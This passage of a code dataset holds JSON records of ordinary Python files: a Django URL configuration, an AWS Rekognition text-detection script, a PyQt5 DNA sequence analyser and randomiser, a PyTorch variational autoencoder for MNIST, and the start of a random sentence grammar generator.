"pygame.K_LEFT", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 54, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 70, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 72, "usage_type": "call"}, {"api_name": "pygame.draw.circle", "line_number": 101, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pygame.draw.circle", "line_number": 131, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 131, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 165, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 166, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.event.get", "line_number": 174, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 174, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 175, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 179, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 179, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 189, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 189, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 196, "usage_type": "call"}]} {"seq_id": "259808208", "text": "\"\"\"\n\nThis module contains the urls for projects app. In future, add any Url related to projects app here.\n\n\"\"\"\nfrom django.conf.urls import url\nfrom projects import views\n\nurlpatterns = [\n url(r'^user_dashboard$', views.project_member_view, name='user_dashboard'),\n url(r'^admin$', views.admin_projects_view, name='admin_projects'),\n url(r'^admin/user_mgmt$', views.user_mgmt, name='user_mgmt'),\n # Passing the project name as an argument to the view function\n url(r'^admin/(\\w+)$', views.admin_projects_edit_view, name='admin_projects_edit'),\n url(r'^admin/(\\w+)/info$', views.admin_projects_info_view, name='admin_projects_info'),\n url(r'^admin/(\\w+)/project_activity$', views.admin_projects_activity, name='admin_project_activity'),\n url(r'^admin/(\\w+)/edit_info$', views.admin_projects_edit_info, name='admin_projects_edit_info'),\n url(r'^admin/(\\w+)/lst_member$', views.list_project_members, name='list_project_members'),\n url(r'^admin/(\\w+)/add_member$', views.admin_projects_add_member, name='admin_projects_add_member'),\n url(r'^admin/(\\w+)/(\\w+)$', views.admin_projects_edit_member, name='admin_projects_edit_member'),\n url(r'^(\\w+)/info$', views.project_info_view, name='projects_info'),\n url(r'^\\w+/metadata$', views.project_info_view, name='projects_metadata'),\n # url(r'^\\w+/members$', views.project_view, name='projects_members'),\n\n]\n", "sub_path": "projects/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1390, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "projects.views.project_member_view", "line_number": 10, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_view", "line_number": 11, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "projects.views.user_mgmt", "line_number": 12, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_edit_view", "line_number": 14, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_info_view", "line_number": 15, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 15, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_activity", "line_number": 16, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 16, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 17, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_edit_info", "line_number": 17, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 18, "usage_type": "call"}, {"api_name": "projects.views.list_project_members", "line_number": 18, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 18, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 19, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_add_member", "line_number": 19, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "projects.views.admin_projects_edit_member", "line_number": 20, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 20, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 21, "usage_type": "call"}, {"api_name": "projects.views.project_info_view", "line_number": 21, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 22, "usage_type": "call"}, {"api_name": "projects.views.project_info_view", "line_number": 22, "usage_type": "attribute"}, {"api_name": "projects.views", "line_number": 22, "usage_type": "name"}]} {"seq_id": "218732264", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# ライブラリをインポート\nimport time\nimport random\nimport boto3\n\n\ndef detect_text(image_path):\n \"\"\"\n AWSを使った画像中の文字を認識する関数\n \"\"\"\n \n # 画像認識の準備\n rekognition = boto3.client(service_name=\"rekognition\")\n with open(image_path, 'rb') as file:\n try:\n # 画像中から文字を認識\n detext_text_data = rekognition.detect_text(Image={'Bytes': file.read()})\n if len(detext_text_data[\"TextDetections\"]) != 0:\n # 認識結果から文字だけを取り出す\n text = detext_text_data[\"TextDetections\"][0][\"DetectedText\"]\n print(\"認識結果: {0}\".format(text))\n else:\n text = \"\"\n print(\"画像中に文字が検出されませんでした。\")\n except Exception as e:\n print(\"AWSが混み合っていますので、しばらくお待ちください。\")\n text = \"\"\n time.sleep(int(random.uniform(0, 5)))\n return text\n\nif __name__ == '__main__':\n # 画像のパス\n image_path = \"../img/forward.jpg\"\n # 画像中の文字を調べる\n text = detect_text(image_path)", "sub_path": "AISystem2/scripts/aws_detect_text.py", "file_name": "aws_detect_text.py", "file_ext": "py", "file_size_in_byte": 1261, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "boto3.client", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 31, "usage_type": "call"}, {"api_name": "random.uniform", "line_number": 31, "usage_type": "call"}]} {"seq_id": "250950706", "text": "\"\"\"\r\n--main Gui File--\r\n\r\nThe gui class creates the functionality for the gui.ui file.\r\n\r\nAllows a user to graphically import a seqence, analyze that seqence then\r\nrandomize as needed. Not very much error handling implemented so far.\r\n\r\nCurrently underdevelopment\r\n\r\n\"\"\"\r\n\r\n\r\n#Metadata\r\n__author__ = \"Scott Howes, Braeden Van Der Velde\"\r\n__credits__ = \"Scott Howes, Braeden Van Der Velde\"\r\n__email__ = \"showes@unbc.ca, velde@unbc.ca\"\r\n__python_version__ = \"3.9.0\"\r\n\r\n\r\n#imports\r\nimport sys\r\nimport os\r\nfrom seq_analyzer import seq_analyzer\r\nfrom seq_randomizer import seq_randomizer\r\nfrom Bio.SeqUtils import GC\r\nfrom Bio.Seq import Seq\r\nfrom PyQt5.QtWidgets import QFileDialog\r\nfrom PyQt5.QtWidgets import QTableWidgetItem\r\nfrom PyQt5.QtWidgets import QMessageBox\r\nfrom PyQt5.QtCore import pyqtSlot\r\nfrom PyQt5.QtCore import Qt\r\nfrom PyQt5.QtWidgets import QApplication\r\nfrom PyQt5.QtWidgets import QWidget\r\nfrom PyQt5.uic import loadUi\r\n\r\n\r\n#the seq_gui class\r\nclass seq_gui(QWidget):\r\n\r\n\r\n #constructor\r\n def __init__(self):\r\n super(seq_gui, self).__init__()\r\n loadUi(\"GUIs/gui.ui\", self)\r\n self._load_connects()\r\n self.move(20,20)\r\n self.randomizer = seq_randomizer()\r\n\r\n\r\n #loads the connection for the buttons\r\n def _load_connects(self):\r\n\r\n #bttn_create connects\r\n self.bttn_openSeq.clicked.connect(self.bttn_openSeq_clicked)\r\n self.bttn_save.clicked.connect(self.bttn_save_clicked)\r\n self.bttn_clearSeq.clicked.connect(self.bttn_clearSeq_clicked)\r\n self.bttn_randomize.clicked.connect(self.bttn_randomize_clicked)\r\n self.bttn_analyze.clicked.connect(self.bttn_analyze_clicked)\r\n\r\n\r\n #creates the functionality for the Open button\r\n @pyqtSlot()\r\n def bttn_openSeq_clicked(self):\r\n path, _ = QFileDialog.getOpenFileName(None, \"Load Sequence\", \"\", \"Text Files (*.txt)\")\r\n if path:\r\n file = open(path, \"r\")\r\n contents = file.read()\r\n self.textEdit_seq.setText(contents)\r\n\r\n\r\n #creates the functionality for the Save button\r\n @pyqtSlot()\r\n def bttn_save_clicked(self):\r\n path, _ = QFileDialog.getSaveFileName(None, \"Save Sequence\", \"\", \"*.txt\")\r\n if path:\r\n file = open(path, \"w+\")\r\n contents = self.textEdit_seq.toPlainText()\r\n file.write(contents)\r\n file.close()\r\n\r\n\r\n #creates the functionality for the clear button\r\n @pyqtSlot()\r\n def bttn_clearSeq_clicked(self):\r\n self.textEdit_seq.clear()\r\n\r\n\r\n #creates the functionality for the Randomize button\r\n @pyqtSlot()\r\n def bttn_randomize_clicked(self):\r\n\r\n #getting the sequence\r\n seq = self.textEdit_seq.toPlainText()\r\n\r\n #making seq uppercase\r\n seq = seq.upper()\r\n\r\n #valid character check\r\n if self._seqCheck(seq):\r\n\r\n #getting the randomization percentage\r\n randPercent = int(self.label_rand.text())\r\n\r\n #getting amino chain from original sequence\r\n proteinSeq = Seq(seq)\r\n oldAnimoChain = str(proteinSeq.translate())\r\n\r\n #randomiztion process\r\n newSeq = self.randomizer.randomize(seq, randPercent)\r\n\r\n #getting new amino chain\r\n newProteinSeq = Seq(newSeq)\r\n newAnimoChain = str(newProteinSeq.translate())\r\n\r\n #comparing chains\r\n #and updating textedit field and analyzing\r\n if newAnimoChain == oldAnimoChain:\r\n self.textEdit_seq.setText(newSeq)\r\n self._analyzeSequence(newSeq)\r\n else:\r\n self._errorMessage(\"Animo Acid Chain MisMatch\")\r\n self.textEdit_aminoSeq.setText(\"Animo Acid Chain MisMatch!\")\r\n\r\n else:\r\n #Error Message\r\n self._errorMessage(\"Invalid Characters detected in Sequence.\")\r\n\r\n\r\n #creates the functionality for the Analyze Sequence button\r\n @pyqtSlot()\r\n def bttn_analyze_clicked(self):\r\n\r\n #getting the sequence from the text edit boxn\r\n seq = self.textEdit_seq.toPlainText()\r\n\r\n #making seq upper case\r\n seq = seq.upper()\r\n\r\n #checking for valid valid characters\r\n if self._seqCheck(seq):\r\n #calling private analysis functionality\r\n self._analyzeSequence(seq)\r\n\r\n else:\r\n #Error Message\r\n self._errorMessage(\"Invalid Characters detected in Sequence.\")\r\n\r\n\r\n #This function does the analysis on the Sequence in textEdit_seq\r\n def _analyzeSequence(self, sequence):\r\n\r\n #getting sequence length and adding it to character count\r\n self.label_charVal.setText(str(len(sequence)))\r\n\r\n #getting GC richness using biopython\r\n self.label_gcVal.setText(str(round(GC(sequence), 2)))\r\n\r\n #getting Amino Acid composition\r\n protein_seq = Seq(sequence)\r\n self.textEdit_aminoSeq.setText(str(protein_seq.translate()))\r\n\r\n #using seq_analyzer to mine Sequence, returns list of lists\r\n substrings = seq_analyzer.mineSequence(self, sequence, int(self.label_minSubSize.text()), int(self.label_maxSubSize.text()), int(self.label_minOccVal.text()))\r\n\r\n #filling the table\r\n self._populateTable(substrings)\r\n\r\n\r\n #populates the table_subString\r\n def _populateTable(self, list):\r\n\r\n #clearing the table\r\n self.table_subString.setRowCount(0)\r\n\r\n #setting the row count to start adding info\r\n row = 0\r\n\r\n #setting the row count to the number of items\r\n self.table_subString.setRowCount(len(list))\r\n\r\n #adding items\r\n for strings in list:\r\n self.table_subString.setItem(row , 0, QTableWidgetItem(str(strings[0])))\r\n self.table_subString.setItem(row , 1, QTableWidgetItem(str(strings[1])))\r\n self.table_subString.setItem(row , 2, QTableWidgetItem(str(strings[2])))\r\n row = row + 1\r\n\r\n #sorting items by % of sequence\r\n self.table_subString.sortItems(2, Qt.DescendingOrder)\r\n\r\n\r\n #Error Message function\r\n #only parameter is a string which is the Message\r\n def _errorMessage(self, message):\r\n msg = QMessageBox()\r\n msg.setWindowTitle(\"Error Message Box\")\r\n msg.setIcon(QMessageBox.Warning)\r\n msg.setText(\"----- AN ERROR HAS OCCURED -----\")\r\n msg.setInformativeText(message)\r\n msg.exec()\r\n\r\n\r\n #this function check that a sequence is only composed of G's C's A's T's\r\n #not very efficient but does the job\r\n def _seqCheck(self, sequence):\r\n validChars = \"GCAT\"\r\n return all(chars in validChars for chars in sequence)\r\n", "sub_path": "src/seq_gui.py", "file_name": "seq_gui.py", "file_ext": "py", "file_size_in_byte": 6700, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 45, "usage_type": "call"}, {"api_name": "seq_randomizer.seq_randomizer", "line_number": 48, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getOpenFileName", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 63, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog.getSaveFileName", "line_number": 75, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QFileDialog", "line_number": 75, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 84, "usage_type": "call"}, {"api_name": "Bio.Seq.Seq", "line_number": 106, "usage_type": "call"}, {"api_name": "Bio.Seq.Seq", "line_number": 113, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.pyqtSlot", "line_number": 131, "usage_type": "call"}, {"api_name": "Bio.SeqUtils.GC", "line_number": 157, "usage_type": "call"}, {"api_name": "Bio.Seq.Seq", "line_number": 160, "usage_type": "call"}, {"api_name": "seq_analyzer.seq_analyzer.mineSequence", "line_number": 164, "usage_type": "call"}, {"api_name": "seq_analyzer.seq_analyzer", "line_number": 164, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 184, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 185, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTableWidgetItem", "line_number": 186, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.Qt.DescendingOrder", "line_number": 190, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 190, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 196, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QMessageBox.Warning", "line_number": 198, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMessageBox", "line_number": 198, "usage_type": "name"}]} {"seq_id": "141842686", "text": "import argparse\nimport numpy as np\nimport os\nfrom utils_vae import img_tile, mnist_reader\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--epoch\", type=int, default=40)\n parser.add_argument(\"--nz\", type=int, default=20)\n parser.add_argument(\"--layersize\", type=int, default=400)\n parser.add_argument(\"--alpha\", type=float, default=1)\n parser.add_argument(\"--lr\", type=float, default=0.0001)\n parser.add_argument(\"--b1\", type=float, default=0.9)\n parser.add_argument(\"--b2\", type=float, default=0.999)\n parser.add_argument(\"--e\", type=float, default=1e-8)\n parser.add_argument(\"--bsize\", type=int, default=64)\n return parser.parse_args()\n\nargs = parse_args()\n\n\nnp.random.seed(111)\n\nclass VAE(nn.Module):\n def __init__(self, numbers):\n super().__init__()\n\n self.numbers = numbers\n\n self.epochs = args.epoch\n self.batch_size = args.bsize\n self.learning_rate = args.lr\n self.decay = 0.001\n self.nz = args.nz\n self.layersize = args.layersize\n\n self.img_path = \"./images\"\n if not os.path.exists(self.img_path):\n os.makedirs(self.img_path)\n\n # Xavier initialization is used to initialize the weights\n # init encoder weights\n self._e_W0 = np.random.randn(784, self.layersize).astype(np.float32) * np.sqrt(2.0/(784))\n self._e_b0 = np.zeros(self.layersize).astype(np.float32)\n\n self._e_W_mu = np.random.randn(self.layersize, self.nz).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._e_b_mu = np.zeros(self.nz).astype(np.float32)\n\n self._e_W_logvar = np.random.randn(self.layersize, self.nz).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._e_b_logvar = np.zeros(self.nz).astype(np.float32)\n\n # init decoder weights\n self._d_W0 = np.random.randn(self.nz, self.layersize).astype(np.float32) * np.sqrt(2.0/(self.nz))\n self._d_b0 = np.zeros(self.layersize).astype(np.float32)\n\n self._d_W1 = np.random.randn(self.layersize, 784).astype(np.float32) * np.sqrt(2.0/(self.layersize))\n self._d_b1 = np.zeros(784).astype(np.float32)\n\n #\n self.e_W0 = nn.Parameter(torch.from_numpy(self._e_W0).float())\n self.e_b0 = nn.Parameter(torch.from_numpy(self._e_b0).float())\n self.e_W_mu = nn.Parameter(torch.from_numpy(self._e_W_mu).float())\n self.e_b_mu = nn.Parameter(torch.from_numpy(self._e_b_mu).float())\n self.e_W_logvar = nn.Parameter(torch.from_numpy(self._e_W_logvar).float())\n self.e_b_logvar = nn.Parameter(torch.from_numpy(self._e_b_logvar).float())\n\n self.d_W0 = nn.Parameter(torch.from_numpy(self._d_W0).float())\n self.d_b0 = nn.Parameter(torch.from_numpy(self._d_b0).float())\n self.d_W1 = nn.Parameter(torch.from_numpy(self._d_W1).float())\n self.d_b1 = nn.Parameter(torch.from_numpy(self._d_b1).float())\n\n # init Adam optimizer\n self.b1 = args.b1\n self.b2 = args.b2\n self.e = args.e\n self.m = [0] * 10\n self.v = [0] * 10\n self.t = 0\n\n def encoder(self, img):\n #self.e_logvar : log variance\n #self.e_mean : mean\n\n e_input = np.reshape(img, (self.batch_size,-1))\n e_input = torch.from_numpy(e_input).float()\n\n e_h0_l = torch.matmul(e_input, self.e_W0) + self.e_b0\n e_h0_a = nn.LeakyReLU(negative_slope=0.01)(e_h0_l)\n\n e_logvar = torch.matmul(e_h0_a, self.e_W_logvar) + self.e_b_logvar\n e_mu = torch.matmul(e_h0_a, self.e_W_mu) + self.e_b_mu\n\n return e_mu, e_logvar\n\n def decoder(self, z):\n #self.d_out : reconstruction image 28x28\n\n z = z.view(self.batch_size, self.nz)\n\n d_h0_l = torch.matmul(z, self.d_W0) + self.d_b0\n d_h0_a = torch.relu(d_h0_l)\n\n d_h1_l = torch.matmul(d_h0_a, self.d_W1) + self.d_b1\n d_h1_a = torch.sigmoid(d_h1_l)\n\n d_out = d_h1_a.view(self.batch_size, 28, 28, 1)\n\n return d_out\n\n def forward(self, x):\n #Encode\n mu, logvar = self.encoder(x)\n\n #use reparameterization trick to sample from gaussian\n sample_z = mu + torch.exp(logvar * .5) * torch.from_numpy(np.random.standard_normal(size=(self.batch_size, self.nz))).float()\n\n decode = self.decoder(sample_z)\n\n return decode, mu, logvar, None, sample_z\n\n def train(self, optimizer):\n\n #Read in training data\n trainX, _, train_size = mnist_reader(self.numbers)\n\n np.random.shuffle(trainX)\n\n #set batch indices\n batch_idx = train_size//self.batch_size\n batches_per_epoch = min(10, batch_idx)\n # batches_per_epoch = batch_idx\n del batch_idx\n\n total_loss = 0\n total_kl = 0\n total = 0\n\n for epoch in range(self.epochs):\n for idx in range(batches_per_epoch):\n # prepare batch and input vector z\n train_batch = trainX[idx*self.batch_size:idx*self.batch_size + self.batch_size]\n #ignore batch if there are insufficient elements\n if train_batch.shape[0] != self.batch_size:\n break\n\n ################################\n # Forward Pass\n ################################\n\n out, mu, logvar, _, sample_z = self(train_batch)\n\n # Reconstruction Loss\n rec_loss = nn.BCELoss(reduction='sum')(out, torch.from_numpy(train_batch).float())\n\n #K-L Divergence\n # kl = -0.5 * np.sum(1 + logvar - np.power(mu, 2) - np.exp(logvar))\n kl = -0.5 * torch.sum(1 + logvar - mu ** 2 - torch.exp(logvar))\n\n loss = rec_loss + kl\n loss = loss / self.batch_size\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n rec_loss = rec_loss.item()\n kl = kl.item()\n\n #Loss Recordkeeping\n total_loss += rec_loss / self.batch_size\n total_kl += kl / self.batch_size\n total += 1\n\n self.img = np.squeeze(out.data.numpy(), axis=3) * 2 - 1\n\n print(\"Epoch [%d] Step [%d/%d] RC Loss:%.4f KL Loss:%.4f lr: %.4f\"%(\n epoch, idx, batches_per_epoch, rec_loss / self.batch_size, kl / self.batch_size, self.learning_rate))\n\n sample = np.array(self.img)\n\n #save image result every epoch\n img_tile(sample, self.img_path, epoch, idx, \"res\", True)\n\n\nif __name__ == '__main__':\n\n # Adjust the numbers that appear in the training data. Less numbers helps\n # run the program to see faster results\n numbers = [1, 2, 3]\n model = VAE(numbers)\n\n for name, p in model.named_parameters():\n print(name, p.shape)\n\n optimizer = optim.Adam(model.parameters(), lr=args.lr, betas=(args.b1, args.b2), eps=args.e)\n model.train(optimizer)\n", "sub_path": "torchvae.py", "file_name": "torchvae.py", "file_ext": "py", "file_size_in_byte": 7034, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 27, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 29, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 49, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 51, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 54, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 55, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 58, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.float32", "line_number": 61, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 62, "usage_type": "attribute"}, {"api_name": "torch.nn.Parameter", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 65, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 68, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 68, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 74, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 89, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 92, "usage_type": "call"}, {"api_name": "torch.nn.LeakyReLU", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 93, "usage_type": "name"}, {"api_name": "torch.matmul", "line_number": 95, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 96, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 105, "usage_type": "call"}, {"api_name": "torch.relu", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.matmul", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.sigmoid", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 120, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 120, "usage_type": "attribute"}, {"api_name": "utils_vae.mnist_reader", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 131, "usage_type": "attribute"}, {"api_name": "torch.nn.BCELoss", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 158, "usage_type": "name"}, {"api_name": "torch.from_numpy", "line_number": 158, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 162, "usage_type": "call"}, {"api_name": "torch.exp", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "utils_vae.img_tile", "line_number": 187, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 200, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 200, "usage_type": "name"}]} {"seq_id": "631874317", "text": "import random\r\nimport pandas as pd\r\nimport re\r\nimport jieba\r\nfrom collections import Counter\r\nfrom functools import reduce\r\nfrom operator import add, mul\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport random\r\n\r\n#A \"movie comment\" language can be defined as\r\ncommenter = \"\"\"\r\nsentence = noun_phrase verb_phrase \r\nnoun_phrase = noun \r\nnoun = 这部电影 | 剧情 |故事\r\nverb_phrase = verb adj_phrase\r\nverb = 是 | 感觉 | 演的 \r\nadj_phrase = adj\r\nadj = 最好看 | 好看 | 不好看 |可以 |喜欢 | 很好看\r\n\r\n\"\"\"\r\n# create the rule of grammer of \"movie reviewer\" language\r\ndef create_grammar(grammar_str, split='=>', line_split='\\n'):\r\n grammar = {}\r\n for line in grammar_str.split(line_split):\r\n if not line.strip(): continue\r\n exp, stmt = line.split(split)\r\n grammar[exp.strip()] = [s.split() for s in stmt.split('|')]\r\n return grammar\r\n\r\nchoice = random.choice\r\n# randomly create a 